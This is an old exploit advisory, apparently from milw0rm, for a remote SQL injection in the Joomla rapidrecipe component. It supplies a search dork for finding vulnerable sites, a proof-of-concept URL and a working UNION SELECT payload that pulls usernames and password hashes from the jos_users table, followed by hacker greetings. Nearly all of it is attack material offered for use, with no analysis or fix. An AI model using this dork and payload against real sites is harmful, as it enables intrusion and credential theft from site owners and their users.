21 lines
971 B
Text
Executable file
21 lines
971 B
Text
Executable file
/---------------------------------------------------------------\
|
|
\ /
|
|
/ Joomla Component rapidrecipe Remote SQL injection \
|
|
\ /
|
|
\---------------------------------------------------------------/
|
|
|
|
|
|
[*] Author : His0k4 [ALGERIAN HaCkEr]
|
|
|
|
[*] Dork : inurl:com_rapidrecipe "recipe_id"
|
|
|
|
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}
|
|
|
|
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
|
|
|
|
|
|
----------------------------------------------------------------------------
|
|
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
|
|
[*] Greetings2: http://palcastle.org/cc
|
|
|
|
# milw0rm.com [2008-06-08]
|